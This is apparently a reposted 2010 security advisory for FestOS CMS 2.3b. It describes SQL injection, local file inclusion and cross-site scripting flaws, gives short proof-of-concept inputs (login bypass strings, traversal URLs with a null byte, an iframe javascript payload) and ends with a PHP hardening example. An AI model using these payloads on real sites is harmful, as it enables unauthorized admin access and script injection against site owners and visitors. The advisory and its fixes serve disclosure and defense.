FestOS CMS 2.3b cross site scripting, local file inclusion, SQL injection

2010.09.13
Credit: abysssec
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

MOAUB Day 9 (0day)
http://www.exploit-db.com/moaub-9-festos-cms-2-3b-multiple-remote-vulnerabilities/

Title : FestOS CMS 2.3b Multiple Remote Vulnerabilities
Affected Version : <=2.3b
Vendor Site : http://festengine.org/
Discovery : abysssec.com
Description : This CMS has many critical vulnerabilities; we describe some of them here.

Vulnerabilities:

1- SQL Injection Vulnerability:

1.1- in admin/do_login.php, line 17:

// Process the login
$query = "SELECT userid, roleID, username FROM ".$config['dbprefix']."users WHERE LCASE(username) = '".strtolower($_POST['username'])."' and password ='".md5($_POST['password'])."'";
$res = $festos->query($query);

poc: in the admin.php page:
username: admin' or '1'='1
password: admin' or '1'='1

1.2- in festos_z_dologin.php:

$query = "SELECT vendorID FROM ".$config['dbprefix']."vendors WHERE LCASE(email) = '".strtolower($_POST['email'])."' and password ='".$_POST['password']."'";

poc: in the applications.php page:
email: anything
pass: a' or 1=1/*

2- Local File Inclusion (LFI):

Vulnerability in index.php, line 41:

if(isset($_GET['theme']) && !empty($_GET['theme']) && file_exists($config['ABSOLUTE_FILE_PATH'].'themes/'.$_GET['theme'])) {
...
require_once($themepath.'/includes/header.php');

The theme value is only checked with file_exists(), so a traversal sequence followed by a null byte passes the check and the traversed path is then included.

poc:
http://localhost/festos/index.php?theme=../admin/css/admin.css%00
http://localhost/festos/artists.php?theme=../admin/css/admin.css%00
http://localhost/festos/contacts.php?theme=../admin/css/admin.css%00
http://localhost/festos/applications.php?theme=../admin/css/admin.css%00
http://localhost/festos/entertainers.php?theme=../admin/css/admin.css%00
http://localhost/festos/exhibitors.php?theme=../admin/css/admin.css%00
http://localhost/festos/foodvendors.php?theme=../admin/css/admin.css%00
http://localhost/festos/performanceschedule.php?theme=../admin/css/admin.css%00
http://localhost/festos/sponsors.php?theme=../admin/css/admin.css%00
http://localhost/festos/winners.php?theme=../admin/css/admin.css%00

3- Cross Site Scripting:

foodvendors.php includes the festos_foodvendors.php page. Lines 31-36:

switch($switcher) {
    case 'details':
        if(!isset($_GET['vendorID']) || ctype_digit($_GET['vendorID'])===FALSE || $_GET['vendorID'] == '') {
            $template = 'foodvendors_nonespecified.tpl';
            break;
        }

and in line 74:

$tpl->set('vType', $_GET['category']);

and foodvendors_nonespecified.tpl, line 123:

<p>Back to the list of <a href="<?php echo $_SERVER['PHP_SELF'];?>?view=list&vTypeID=<?php echo $vTypeID;?>" title="<?php echo $vType;?> Category">exhibitors in the <?php echo $vType;?> category</a>.</p>

The category parameter is echoed into the template without encoding, so it is vulnerable to XSS:

poc:
http://localhost/festos/foodvendors.php?view=details&vendorID=4&category=%3Ciframe%20src=javascript:alert%28%22XSS%22%29;&vTypeID=28
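As an added example (not part of the advisory or of the FestOS code), the three vulnerable spots above rewritten with parameter binding, theme-name validation and output encoding; the function names, the PDO handle $pdo and the $themesDir argument are assumptions.

```php
<?php
// Added hardening example; function names, the PDO handle $pdo and
// $themesDir are assumptions, not FestOS code.

// 1. admin/do_login.php: bind the POST values instead of concatenating them.
function find_user(PDO $pdo, array $config, string $username, string $password): ?array
{
    // The table prefix comes from config, never from the request.
    $sql = "SELECT userid, roleID, username FROM {$config['dbprefix']}users "
         . "WHERE LCASE(username) = :username AND password = :password";
    $stmt = $pdo->prepare($sql);
    // Bound values are sent apart from the SQL text, so admin' or '1'='1
    // is compared literally as a username and cannot change the WHERE clause.
    $stmt->execute([
        ':username' => strtolower($username),
        ':password' => md5($password), // unchanged: the CMS stores md5 hashes
    ]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 2. index.php: accept only a bare directory name and confirm the resolved
//    path is still under the themes directory. Rejecting '/', '.' and NUL up
//    front also removes the %00 truncation that file_exists() fell for.
function resolve_theme_path(string $themesDir, string $theme): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\z/', $theme)) {
        return null;
    }
    $base = realpath($themesDir);
    $candidate = realpath($themesDir . DIRECTORY_SEPARATOR . $theme);
    if ($base === false || $candidate === false || !is_dir($candidate)) {
        return null;
    }
    // Trailing separator so "themes/default" cannot match "themes/defaultX".
    if (strpos($candidate . DIRECTORY_SEPARATOR, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate; // caller then requires $candidate . '/includes/header.php'
}

// 3. foodvendors_nonespecified.tpl: HTML-encode $vType (and $vTypeID) at output,
//    so the <iframe src=javascript:...> payload is rendered as text, not markup.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
// Template usage: echo esc($vType) wherever the template currently echoes $vType.
```

With resolve_theme_path() in place, the index.php check becomes a lookup of the returned path rather than a file_exists() on user-controlled input, and the null-byte PoC URLs above are rejected before any filesystem call.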


Copyright 2024, cxsecurity.com
